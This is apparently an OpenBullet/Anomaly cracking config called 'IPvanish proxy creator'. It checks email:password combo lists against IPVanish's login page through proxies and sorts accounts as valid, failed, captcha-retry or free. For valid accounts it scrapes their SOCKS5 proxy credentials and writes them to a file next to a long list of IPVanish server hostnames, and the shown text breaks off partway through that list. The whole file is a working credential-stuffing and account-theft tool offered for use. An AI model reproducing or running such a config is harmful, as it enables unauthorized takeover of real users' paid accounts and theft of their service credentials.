[SETTINGS]
{
  "Name": "IPvanish proxy creator",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-02-24T22:46:44.20263+00:00",
  "AdditionalInfo": "",
  "Author": "simple",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://account.ipvanish.com/login/validate" 
  
  HEADER "origin: https://account.ipvanish.com" 
  HEADER "referer: https://account.ipvanish.com/login" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 124" 

PARSE "<SOURCE>" LR "name=\"clientToken\" id=\"clientToken\" value=\"" "\"/>" -> VAR "TOO" 

REQUEST POST "https://account.ipvanish.com/login/validate" 
  CONTENT "clientToken=<TOO>&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "origin: https://account.ipvanish.com" 
  HEADER "referer: https://account.ipvanish.com/login" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 124" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Sorry, your account credentials are invalid. Please try again." 
  KEYCHAIN Retry OR 
    KEY "We were unable to validate the captcha. Please check the box below to proceed with account login." 
  KEYCHAIN Success OR 
    KEY "class=\"profile_label\">Active</span>" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Update Billing Information" 

REQUEST GET "https://account.ipvanish.com/index.php?t=SOCKS5%20Proxy" 
  
  HEADER "origin: https://account.ipvanish.com" 
  HEADER "referer: https://account.ipvanish.com/login" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 124" 

PARSE "<SOURCE>" LR "<script>document.cookie=\"vtype=2; expires=" ";" CreateEmpty=FALSE UseRegexLR=TRUE -> CAP "expire" 

PARSE "<SOURCE>" LR "<p><b>Username:</b> " "</p>" CreateEmpty=FALSE -> CAP "Username" 

PARSE "<SOURCE>" LR "Password:</b> " "<br></p>" CreateEmpty=FALSE -> CAP "Password" 

UTILITY File "Ipvainsh Proxy.txt" AppendLines "jnb-c17.ipvanish.com:1080:<Username>:<Password>\\njnb-c18.ipvanish.com:1080:<Username>:<Password>\\njnb-c19.ipvanish.com:1080:<Username>:<Password>\\njnb-c20.ipvanish.com:1080:<Username>:<Password>\\njnb-c21.ipvanish.com:1080:<Username>:<Password>\\njnb-c22.ipvanish.com:1080:<Username>:<Password>\\niad-a18.ipvanish.com:1080:<Username>:<Password>\\niad-a20.ipvanish.com:1080:<Username>:<Password>\\niad-a19.ipvanish.com:1080:<Username>:<Password>\\niad-a21.ipvanish.com:1080:<Username>:<Password>\\niad-a22.ipvanish.com:1080:<Username>:<Password>\\niad-a23.ipvanish.com:1080:<Username>:<Password>\\niad-a24.ipvanish.com:1080:<Username>:<Password>\\niad-a25.ipvanish.com:1080:<Username>:<Password>\\niad-a26.ipvanish.com:1080:<Username>:<Password>\\niad-a27.ipvanish.com:1080:<Username>:<Password>\\niad-a28.ipvanish.com:1080:<Username>:<Password>\\niad-a29.ipvanish.com:1080:<Username>:<Password>\\niad-a30.ipvanish.com:1080:<Username>:<Password>\\niad-a31.ipvanish.com:1080:<Username>:<Password>\\niad-a32.ipvanish.com:1080:<Username>:<Password>\\niad-a33.ipvanish.com:1080:<Username>:<Password>\\niad-a34.ipvanish.com:1080:<Username>:<Password>\\niad-a35.ipvanish.com:1080:<Username>:<Password>\\niad-a36.ipvanish.com:1080:<Username>:<Password>\\niad-a37.ipvanish.com:1080:<Username>:<Password>\\niad-a38.ipvanish.com:1080:<Username>:<Password>\\niad-a39.ipvanish.com:1080:<Username>:<Password>\\niad-a40.ipvanish.com:1080:<Username>:<Password>\\niad-a41.ipvanish.com:1080:<Username>:<Password>\\niad-a42.ipvanish.com:1080:<Username>:<Password>\\niad-a65.ipvanish.com:1080:<Username>:<Password>\\niad-a43.ipvanish.com:1080:<Username>:<Password>\\niad-a66.ipvanish.com:1080:<Username>:<Password>\\niad-a44.ipvanish.com:1080:<Username>:<Password>\\niad-a67.ipvanish.com:1080:<Username>:<Password>\\niad-a45.ipvanish.com:1080:<Username>:<Password>\\niad-a68.ipvanish.com:1080:<Username>:<Password>\\niad-a46.ipvanish.com:1080:<Username>:<Password>\\niad-a69.ipvanish.com:1080:<Username>:<Password>\\niad-a47.ipvanish.com:1080:<Username>:<Password>\\niad-a70.ipvanish.com:1080:<Username>:<Password>\\niad-a48.ipvanish.com:1080:<Username>:<Password>\\niad-a71.ipvanish.com:1080:<Username>:<Password>\\niad-a49.ipvanish.com:1080:<Username>:<Password>\\niad-a72.ipvanish.com:1080:<Username>:<Password>\\niad-a50.ipvanish.com:1080:<Username>:<Password>\\niad-a73.ipvanish.com:1080:<Username>:<Password>\\niad-a52.ipvanish.com:1080:<Username>:<Password>\\niad-a74.ipvanish.com:1080:<Username>:<Password>\\niad-a53.ipvanish.com:1080:<Username>:<Password>\\niad-a75.ipvanish.com:1080:<Username>:<Password>\\niad-a54.ipvanish.com:1080:<Username>:<Password>\\niad-a76.ipvanish.com:1080:<Username>:<Password>\\niad-a55.ipvanish.com:1080:<Username>:<Password>\\niad-a77.ipvanish.com:1080:<Username>:<Password>\\niad-a56.ipvanish.com:1080:<Username>:<Password>\\niad-a78.ipvanish.com:1080:<Username>:<Password>\\niad-a57.ipvanish.com:1080:<Username>:<Password>\\niad-a58.ipvanish.com:1080:<Username>:<Password>\\niad-a59.ipvanish.com:1080:<Username>:<Password>\\niad-a60.ipvanish.com:1080:<Username>:<Password>\\niad-a61.ipvanish.com:1080:<Username>:<Password>\\niad-a62.ipvanish.com:1080:<Username>:<Password>\\niad-a63.ipvanish.com:1080:<Username>:<Password>\\niad-a01.ipvanish.com:1080:<Username>:<Password>\\niad-a02.ipvanish.com:1080:<Username>:<Password>\\niad-a03.ipvanish.com:1080:<Username>:<Password>\\niad-a04.ipvanish.com:1080:<Username>:<Password>\\niad-a05.ipvanish.com:1080:<Username>:<Password>\\niad-a06.ipvanish.com:1080:<Username>:<Password>\\niad-a07.ipvanish.com:1080:<Username>:<Password>\\niad-a08.ipvanish.com:1080:<Username>:<Password>\\niad-a09.ipvanish.com:1080:<Username>:<Password>\\niad-a10.ipvanish.com:1080:<Username>:<Password>\\niad-a11.ipvanish.com:1080:<Username>:<Password>\\niad-a12.ipvanish.com:1080:<Username>:<Password>\\niad-a13.ipvanish.com:1080:<Username>:<Password>\\niad-a14.ipvanish.com:1080:<Username>:<Password>\\niad-a15.ipvanish.com:1080:<Username>:<Password>\\niad-a16.ipvanish.com:1080:<Username>:<Password>\\niad-a17.ipvanish.com:1080:<Username>:<Password>\\natl-a75.ipvanish.com:1080:<Username>:<Password>\\natl-a19.ipvanish.com:1080:<Username>:<Password>\\natl-a20.ipvanish.com:1080:<Username>:<Password>\\natl-a21.ipvanish.com:1080:<Username>:<Password>\\natl-a22.ipvanish.com:1080:<Username>:<Password>\\natl-a76.ipvanish.com:1080:<Username>:<Password>\\natl-a77.ipvanish.com:1080:<Username>:<Password>\\natl-a78.ipvanish.com:1080:<Username>:<Password>\\natl-a79.ipvanish.com:1080:<Username>:<Password>\\natl-a80.ipvanish.com:1080:<Username>:<Password>\\natl-a81.ipvanish.com:1080:<Username>:<Password>\\natl-a82.ipvanish.com:1080:<Username>:<Password>\\natl-a83.ipvanish.com:1080:<Username>:<Password>\\natl-a84.ipvanish.com:1080:<Username>:<Password>\\natl-a85.ipvanish.com:1080:<Username>:<Password>\\natl-a86.ipvanish.com:1080:<Username>:<Password>\\natl-a87.ipvanish.com:1080:<Username>:<Password>\\natl-a88.ipvanish.com:1080:<Username>:<Password>\\natl-a23.ipvanish.com:1080:<Username>:<Password>\\natl-a24.ipvanish.com:1080:<Username>:<Password>\\natl-a25.ipvanish.com:1080:<Username>:<Password>\\natl-a26.ipvanish.com:1080:<Username>:<Password>\\natl-a27.ipvanish.com:1080:<Username>:<Password>\\natl-a28.ipvanish.com:1080:<Username>:<Password>\\natl-a29.ipvanish.com:1080:<Username>:<Password>\\natl-a30.ipvanish.com:1080:<Username>:<Password>\\natl-a31.ipvanish.com:1080:<Username>:<Password>\\natl-a32.ipvanish.com:1080:<Username>:<Password>\\natl-a33.ipvanish.com:1080:<Username>:<Password>\\natl-a34.ipvanish.com:1080:<Username>:<Password>\\natl-a35.ipvanish.com:1080:<Username>:<Password>\\natl-a36.ipvanish.com:1080:<Username>:<Password>\\natl-a37.ipvanish.com:1080:<Username>:<Password>\\natl-a38.ipvanish.com:1080:<Username>:<Password>\\natl-a39.ipvanish.com:1080:<Username>:<Password>\\natl-a40.ipvanish.com:1080:<Username>:<Password>\\natl-a41.ipvanish.com:1080:<Username>:<Password>\\natl-a42.ipvanish.com:1080:<Username>:<Password>\\natl-a47.ipvanish.com:1080:<Username>:<Password>\\natl-a48.ipvanish.com:1080:<Username>:<Password>\\natl-a49.ipvanish.com:1080:<Username>:<Password>\\natl-a43.ipvanish.com:1080:<Username>:<Password>\\natl-a50.ipvanish.com:1080:<Username>:<Password>\\natl-a44.ipvanish.com:1080:<Username>:<Password>\\natl-a51.ipvanish.com:1080:<Username>:<Password>\\natl-a45.ipvanish.com:1080:<Username>:<Password>\\natl-a52.ipvanish.com:1080:<Username>:<Password>\\natl-a46.ipvanish.com:1080:<Username>:<Password>\\natl-a53.ipvanish.com:1080:<Username>:<Password>\\natl-a54.ipvanish.com:1080:<Username>:<Password>\\natl-a55.ipvanish.com:1080:<Username>:<Password>\\natl-a56.ipvanish.com:1080:<Username>:<Password>\\natl-a57.ipvanish.com:1080:<Username>:<Password>\\natl-a58.ipvanish.com:1080:<Username>:<Password>\\natl-a59.ipvanish.com:1080:<Username>:<Password>\\natl-a60.ipvanish.com:1080:<Username>:<Password>\\natl-a61.ipvanish.com:1080:<Username>:<Password>\\natl-a62.ipvanish.com:1080:<Username>:<Password>\\natl-a63.ipvanish.com:1080:<Username>:<Password>\\natl-a64.ipvanish.com:1080:<Username>:<Password>\\natl-a65.ipvanish.com:1080:<Username>:<Password>\\natl-a66.ipvanish.com:1080:<Username>:<Password>\\natl-a67.ipvanish.com:1080:<Username>:<Password>\\natl-a68.ipvanish.com:1080:<Username>:<Password>\\natl-a01.ipvanish.com:1080:<Username>:<Password>\\natl-a69.ipvanish.com:1080:<Username>:<Password>\\natl-a02.ipvanish.com:1080:<Username>:<Password>\\natl-a70.ipvanish.com:1080:<Username>:<Password>\\natl-a03.ipvanish.com:1080:<Username>:<Password>\\natl-a04.ipvanish.com:1080:<Username>:<Password>\\natl-a05.ipvanish.com:1080:<Username>:<Password>\\natl-a06.ipvanish.com:1080:<Username>:<Password>\\natl-a07.ipvanish.com:1080:<Username>:<Password>\\natl-a08.ipvanish.com:1080:<Username>:<Password>\\natl-a09.ipvanish.com:1080:<Username>:<Password>\\natl-a10.ipvanish.com:1080:<Username>:<Password>\\natl-a11.ipvanish.com:1080:<Username>:<Password>\\natl-a12.ipvanish.com:1080:<Username>:<Password>\\natl-a13.ipvanish.com:1080:<Username>:<Password>\\natl-a14.ipvanish.com:1080:<Username>:<Password>\\natl-a15.ipvanish.com:1080:<Username>:<Password>\\natl-a16.ipvanish.com:1080:<Username>:<Password>\\natl-a17.ipvanish.com:1080:<Username>:<Password>\\natl-a18.ipvanish.com:1080:<Username>:<Password>\\natl-a73.ipvanish.com:1080:<Username>:<Password>\\natl-a74.ipvanish.com:1080:<Username>:<Password>\\nbos-c22.ipvanish.com:1080:<Username>:<Password>\\nbos-c59.ipvanish.com:1080:<Username>:<Password>\\nbos-c60.ipvanish.com:1080:<Username>:<Password>\\nbos-c61.ipvanish.com:1080:<Username>:<Password>\\nbos-c62.ipvanish.com:1080:<Username>:<Password>\\nbos-c63.ipvanish.com:1080:<Username>:<Password>\\nbos-c64.ipvanish.com:1080:<Username>:<Password>\\nbos-c29.ipvanish.com:1080:<Username>:<Password>\\nbos-c65.ipvanish.com:1080:<Username>:<Password>\\nbos-c30.ipvanish.com:1080:<Username>:<Password>\\nbos-c66.ipvanish.com:1080:<Username>:<Password>\\nbos-c31.ipvanish.com:1080:<Username>:<Password>\\nbos-c67.ipvanish.com:1080:<Username>:<Password>\\nbos-c33.ipvanish.com:1080:<Username>:<Password>\\nbos-c68.ipvanish.com:1080:<Username>:<Password>\\nbos-c34.ipvanish.com:1080:<Username>:<Password>\\nbos-c69.ipvanish.com:1080:<Username>:<Password>\\nbos-c35.ipvanish.com:1080:<Username>:<Password>\\nbos-c70.ipvanish.com:1080:<Username>:<Password>\\nbos-c36.ipvanish.com:1080:<Username>:<Password>\\nbos-c71.ipvanish.com:1080:<Username>:<Password>\\nbos-c37.ipvanish.com:1080:<Username>:<Password>\\nbos-c72.ipvanish.com:1080:<Username>:<Password>\\nbos-c38.ipvanish.com:1080:<Username>:<Password>\\nbos-c73.ipvanish.com:1080:<Username>:<Password>\\nbos-c39.ipvanish.com:1080:<Username>:<Password>\\nbos-c40.ipvanish.com:1080:<Username>:<Password>\\nbos-c01.ipvanish.com:1080:<Username>:<Password>\\nbos-c41.ipvanish.com:1080:<Username>:<Password>\\nbos-c02.ipvanish.com:1080:<Username>:<Password>\\nbos-c42.ipvanish.com:1080:<Username>:<Password>\\nbos-c03.ipvanish.com:1080:<Username>:<Password>\\nbos-c43.ipvanish.com:1080:<Username>:<Password>\\nbos-c04.ipvanish.com:1080:<Username>:<Password>\\nbos-c44.ipvanish.com:1080:<Username>:<Password>\\nbos-c05.ipvanish.com:1080:<Username>:<Password>\\nbos-c45.ipvanish.com:1080:<Username>:<Password>\\nbos-c06.ipvanish.com:1080:<Username>:<Password>\\nbos-c46.ipvanish.com:1080:<Username>:<Password>\\nbos-c07.ipvanish.com:1080:<Username>:<Password>\\nbos-c47.ipvanish.com:1080:<Username>:<Password>\\nbos-c08.ipvanish.com:1080:<Username>:<Password>\\nbos-c48.ipvanish.com:1080:<Username>:<Password>\\nbos-c09.ipvanish.com:1080:<Username>:<Password>\\nbos-c49.ipvanish.com:1080:<Username>:<Password>\\nbos-c11.ipvanish.com:1080:<Username>:<Password>\\nbos-c50.ipvanish.com:1080:<Username>:<Password>\\nbos-c12.ipvanish.com:1080:<Username>:<Password>\\nbos-c51.ipvanish.com:1080:<Username>:<Password>\\nbos-c13.ipvanish.com:1080:<Username>:<Password>\\nbos-c52.ipvanish.com:1080:<Username>:<Password>\\nbos-c14.ipvanish.com:1080:<Username>:<Password>\\nbos-c53.ipvanish.com:1080:<Username>:<Password>\\nbos-c15.ipvanish.com:1080:<Username>:<Password>\\nbos-c54.ipvanish.com:1080:<Username>:<Password>\\nbos-c16.ipvanish.com:1080:<Username>:<Password>\\nbos-c55.ipvanish.com:1080:<Username>:<Password>\\nbos-c17.ipvanish.com:1080:<Username>:<Password>\\nbos-c56.ipvanish.com:1080:<Username>:<Password>\\nbos-c19.ipvanish.com:1080:<Username>:<Password>\\nbos-c57.ipvanish.com:1080:<Username>:<Password>\\nbos-c20.ipvanish.com:1080:<Username>:<Password>\\nbos-c21.ipvanish.com:1080:<Username>:<Password>\\nbos-c23.ipvanish.com:1080:<Username>:<Password>\\nbos-c24.ipvanish.com:1080:<Username>:<Password>\\nbos-c25.ipvanish.com:1080:<Username>:<Password>\\nbos-c26.ipvanish.com:1080:<Username>:<Password>\\nbos-c27.ipvanish.com:1080:<Username>:<Password>\\nbos-c28.ipvanish.com:1080:<Username>:<Password>\\nclt-c01.ipvanish.com:1080:<Username>:<Password>\\nclt-c02.ipvanish.com:1080:<Username>:<Password>\\nclt-c03.ipvanish.com:1080:<Username>:<Password>\\nclt-c04.ipvanish.com:1080:<Username>:<Password>\\nclt-c05.ipvanish.com:1080:<Username>:<Password>\\nclt-c06.ipvanish.com:1080:<Username>:<Password>\\nclt-c07.ipvanish.com:1080:<Username>:<Password>\\nclt-c08.ipvanish.com:1080:<Username>:<Password>\\nclt-c09.ipvanish.com:1080:<Username>:<Password>\\nclt-c10.ipvanish.com:1080:<Username>:<Password>\\nclt-c11.ipvanish.com:1080:<Username>:<Password>\\nclt-c12.ipvanish.com:1080:<Username>:<Password>\\nclt-c13.ipvanish.com:1080:<Username>:<Password>\\nclt-c14.ipvanish.com:1080:<Username>:<Password>\\nclt-c15.ipvanish.com:1080:<Username>:<Password>\\nclt-c16.ipvanish.com:1080:<Username>:<Password>\\nclt-c21.ipvanish.com:1080:<Username>:<Password>\\nclt-c17.ipvanish.com:1080:<Username>:<Password>\\nclt-c22.ipvanish.com:1080:<Username>:<Password>\\nclt-c18.ipvanish.com:1080:<Username>:<Password>\\nclt-c23.ipvanish.com:1080:<Username>:<Password>\\nclt-c19.ipvanish.com:1080:<Username>:<Password>\\nclt-c24.ipvanish.com:1080:<Username>:<Password>\\nclt-c25.ipvanish.com:1080:<Username>:<Password>\\nclt-c26.ipvanish.com:1080:<Username>:<Password>\\nchi-a06.ipvanish.com:1080:<Username>:<Password>\\nchi-a19.ipvanish.com:1080:<Username>:<Password>\\nchi-c29.ipvanish.com:1080:<Username>:<Password>\\nchi-a21.ipvanish.com:1080:<Username>:<Password>\\nchi-c30.ipvanish.com:1080:<Username>:<Password>\\nchi-a18.ipvanish.com:1080:<Username>:<Password>\\nchi-c31.ipvanish.com:1080:<Username>:<Password>\\nchi-a20.ipvanish.com:1080:<Username>:<Password>\\nchi-c32.ipvanish.com:1080:<Username>:<Password>\\nchi-a22.ipvanish.com:1080:<Username>:<Password>\\nchi-c33.ipvanish.com:1080:<Username>:<Password>\\nchi-a45.ipvanish.com:1080:<Username>:<Password>\\nchi-a23.ipvanish.com:1080:<Username>:<Password>\\nchi-c34.ipvanish.com:1080:<Username>:<Password>\\nchi-a46.ipvanish.com:1080:<Username>:<Password>\\nchi-a25.ipvanish.com:1080:<Username>:<Password>\\nchi-c35.ipvanish.com:1080:<Username>:<Password>\\nchi-a47.ipvanish.com:1080:<Username>:<Password>\\nchi-a27.ipvanish.com:1080:<Username>:<Password>\\nchi-c36.ipvanish.com:1080:<Username>:<Password>\\nchi-a48.ipvanish.com:1080:<Username>:<Password>\\nchi-a29.ipvanish.com:1080:<Username>:<Password>\\nchi-c37.ipvanish.com:1080:<Username>:<Password>\\nchi-a49.ipvanish.com:1080:<Username>:<Password>\\nchi-a31.ipvanish.com:1080:<Username>:<Password>\\nchi-c38.ipvanish.com:1080:<Username>:<Password>\\nchi-a50.ipvanish.com:1080:<Username>:<Password>\\nchi-a33.ipvanish.com:1080:<Username>:<Password>\\nchi-c39.ipvanish.com:1080:<Username>:<Password>\\nchi-a51.ipvanish.com:1080:<Username>:<Password>\\nchi-a35.ipvanish.com:1080:<Username>:<Password>\\nchi-c40.ipvanish.com:1080:<Username>:<Password>\\nchi-a52.ipvanish.com:1080:<Username>:<Password>\\nchi-a24.ipvanish.com:1080:<Username>:<Password>\\nchi-c41.ipvanish.com:1080:<Username>:<Password>\\nchi-a53.ipvanish.com:1080:<Username>:<Password>\\nchi-a26.ipvanish.com:1080:<Username>:<Password>\\nchi-a54.ipvanish.com:1080:<Username>:<Password>\\nchi-a28.ipvanish.com:1080:<Username>:<Password>\\nchi-a55.ipvanish.com:1080:<Username>:<Password>\\nchi-a30.ipvanish.com:1080:<Username>:<Password>\\nchi-a56.ipvanish.com:1080:<Username>:<Password>\\nchi-a32.ipvanish.com:1080:<Username>:<Password>\\nchi-a57.ipvanish.com:1080:<Username>:<Password>\\nchi-a34.ipvanish.com:1080:<Username>:<Password>\\nchi-a58.ipvanish.com:1080:<Username>:<Password>\\nchi-a36.ipvanish.com:1080:<Username>:<Password>\\nchi-a59.ipvanish.com:1080:<Username>:<Password>\\nchi-a39.ipvanish.com:1080:<Username>:<Password>\\nchi-a60.ipvanish.com:1080:<Username>:<Password>\\nchi-a38.ipvanish.com:1080:<Username>:<Password>\\nchi-a61.ipvanish.com:1080:<Username>:<Password>\\nchi-a40.ipvanish.com:1080:<Username>:<Password>\\nchi-a62.ipvanish.com:1080:<Username>:<Password>\\nchi-a63.ipvanish.com:1080:<Username>:<Password>\\nchi-a64.ipvanish.com:1080:<Username>:<Password>\\nchi-a08.ipvanish.com:1080:<Username>:<Password>\\nchi-a10.ipvanish.com:1080:<Username>:<Password>\\nchi-a12.ipvanish.com:1080:<Username>:<Password>\\nchi-a14.ipvanish.com:1080:<Username>:<Password>\\nchi-a16.ipvanish.com:1080:<Username>:<Password>\\nchi-a07.ipvanish.com:1080:<Username>:<Password>\\nchi-a09.ipvanish.com:1080:<Username>:<Password>\\nchi-a11.ipvanish.com:1080:<Username>:<Password>\\nchi-a13.ipvanish.com:1080:<Username>:<Password>\\nchi-a15.ipvanish.com:1080:<Username>:<Password>\\nchi-a04.ipvanish.com:1080:<Username>:<Password>\\nchi-a02.ipvanish.com:1080:<Username>:<Password>\\nchi-a01.ipvanish.com:1080:<Username>:<Password>\\nchi-a03.ipvanish.com:1080:<Username>:<Password>\\nchi-a41.ipvanish.com:1080:<Username>:<Password>\\nchi-c18.ipvanish.com:1080:<Username>:<Password>\\nchi-c19.ipvanish.com:1080:<Username>:<Password>\\nchi-c20.ipvanish.com:1080:<Username>:<Password>\\nchi-c17.ipvanish.com:1080:<Username>:<Password>\\nchi-c21.ipvanish.com:1080:<Username>:<Password>\\nchi-c22.ipvanish.com:1080:<Username>:<Password>\\nchi-c23.ipvanish.com:1080:<Username>:<Password>\\nchi-c24.ipvanish.com:1080:<Username>:<Password>\\nchi-c25.ipvanish.com:1080:<Username>:<Password>\\nchi-c26.ipvanish.com:1080:<Username>:<Password>\\nchi-c27.ipvanish.com:1080:<Username>:<Password>\\nchi-a17.ipvanish.com:1080:<Username>:<Password>\\nchi-c28.ipvanish.com:1080:<Username>:<Password>\\ndal-a45.ipvanish.com:1080:<Username>:<Password>\\ndal-a46.ipvanish.com:1080:<Username>:<Password>\\ndal-a47.ipvanish.com:1080:<Username>:<Password>\\ndal-a48.ipvanish.com:1080:<Username>:<Password>\\ndal-a49.ipvanish.com:1080:<Username>:<Password>\\ndal-a50.ipvanish.com:1080:<Username>:<Password>\\ndal-a51.ipvanish.com:1080:<Username>:<Password>\\ndal-a52.ipvanish.com:1080:<Username>:<Password>\\ndal-a53.ipvanish.com:1080:<Username>:<Password>\\ndal-a54.ipvanish.com:1080:<Username>:<Password>\\ndal-a55.ipvanish.com:1080:<Username>:<Password>\\ndal-a58.ipvanish.com:1080:<Username>:<Password>\\ndal-a59.ipvanish.com:1080:<Username>:<Password>\\ndal-a60.ipvanish.com:1080:<Username>:<Password>\\ndal-a61.ipvanish.com:1080:<Username>:<Password>\\ndal-a21.ipvanish.com:1080:<Username>:<Password>\\ndal-a62.ipvanish.com:1080:<Username>:<Password>\\ndal-a23.ipvanish.com:1080:<Username>:<Password>\\ndal-a63.ipvanish.com:1080:<Username>:<Password>\\ndal-a25.ipvanish.com:1080:<Username>:<Password>\\ndal-a64.ipvanish.com:1080:<Username>:<Password>\\ndal-a27.ipvanish.com:1080:<Username>:<Password>\\ndal-a65.ipvanish.com:1080:<Username>:<Password>\\ndal-a22.ipvanish.com:1080:<Username>:<Password>\\ndal-a67.ipvanish.com:1080:<Username>:<Password>\\ndal-a24.ipvanish.com:1080:<Username>:<Password>\\ndal-a68.ipvanish.com:1080:<Username>:<Password>\\ndal-a26.ipvanish.com:1080:<Username>:<Password>\\ndal-a69.ipvanish.com:1080:<Username>:<Password>\\ndal-a28.ipvanish.com:1080:<Username>:<Password>\\ndal-a15.ipvanish.com:1080:<Username>:<Password>\\ndal-a70.ipvanish.com:1080:<Username>:<Password>\\ndal-a29.ipvanish.com:1080:<Username>:<Password>\\ndal-a17.ipvanish.com:1080:<Username>:<Password>\\ndal-a31.ipvanish.com:1080:<Username>:<Password>\\ndal-a19.ipvanish.com:1080:<Username>:<Password>\\ndal-a33.ipvanish.com:1080:<Username>:<Password>\\ndal-a16.ipvanish.com:1080:<Username>:<Password>\\ndal-a35.ipvanish.com:1080:<Username>:<Password>\\ndal-a18.ipvanish.com:1080:<Username>:<Password>\\ndal-a30.ipvanish.com:1080:<Username>:<Password>\\ndal-a20.ipvanish.com:1080:<Username>:<Password>\\ndal-a32.ipvanish.com:1080:<Username>:<Password>\\ndal-a34.ipvanish.com:1080:<Username>:<Password>\\ndal-a36.ipvanish.com:1080:<Username>:<Password>\\ndal-a74.ipvanish.com:1080:<Username>:<Password>\\ndal-a75.ipvanish.com:1080:<Username>:<Password>\\ndal-a76.ipvanish.com:1080:<Username>:<Password>\\ndal-a77.ipvanish.com:1080:<Username>:<Password>\\ndal-a06.ipvanish.com:1080:<Username>:<Password>\\ndal-a78.ipvanish.com:1080:<Username>:<Password>\\ndal-a08.ipvanish.com:1080:<Username>:<Password>\\ndal-a10.ipvanish.com:1080:<Username>:<Password>\\ndal-a12.ipvanish.com:1080:<Username>:<Password>\\ndal-a14.ipvanish.com:1080:<Username>:<Password>\\ndal-a05.ipvanish.com:1080:<Username>:<Password>\\ndal-a07.ipvanish.com:1080:<Username>:<Password>\\ndal-a09.ipvanish.com:1080:<Username>:<Password>\\ndal-a11.ipvanish.com:1080:<Username>:<Password>\\ndal-a02.ipvanish.com:1080:<Username>:<Password>\\ndal-a13.ipvanish.com:1080:<Username>:<Password>\\ndal-a01.ipvanish.com:1080:<Username>:<Password>\\ndal-a38.ipvanish.com:1080:<Username>:<Password>\\ndal-a39.ipvanish.com:1080:<Username>:<Password>\\ndal-a40.ipvanish.com:1080:<Username>:<Password>\\ndal-a41.ipvanish.com:1080:<Username>:<Password>\\ndal-a42.ipvanish.com:1080:<Username>:<Password>\\ndal-a03.ipvanish.com:1080:<Username>:<Password>\\ndal-a43.ipvanish.com:1080:<Username>:<Password>\\ndal-a04.ipvanish.com:1080:<Username>:<Password>\\ndal-a44.ipvanish.com:1080:<Username>:<Password>\\nden-a21.ipvanish.com:1080:<Username>:<Password>\\nden-a22.ipvanish.com:1080:<Username>:<Password>\\nden-a23.ipvanish.com:1080:<Username>:<Password>\\nden-a24.ipvanish.com:1080:<Username>:<Password>\\nden-a26.ipvanish.com:1080:<Username>:<Password>\\nden-a27.ipvanish.com:1080:<Username>:<Password>\\nden-a28.ipvanish.com:1080:<Username>:<Password>\\nden-a29.ipvanish.com:1080:<Username>:<Password>\\nden-a01.ipvanish.com:1080:<Username>:<Password>\\nden-a02.ipvanish.com:1080:<Username>:<Password>\\nden-a03.ipvanish.com:1080:<Username>:<Password>\\nden-a04.ipvanish.com:1080:<Username>:<Password>\\nden-a05.ipvanish.com:1080:<Username>:<Password>\\nden-a06.ipvanish.com:1080:<Username>:<Password>\\nden-a07.ipvanish.com:1080:<Username>:<Password>\\nden-a08.ipvanish.com:1080:<Username>:<Password>\\nden-a09.ipvanish.com:1080:<Username>:<Password>\\nden-a10.ipvanish.com:1080:<Username>:<Password>\\nden-a11.ipvanish.com:1080:<Username>:<Pa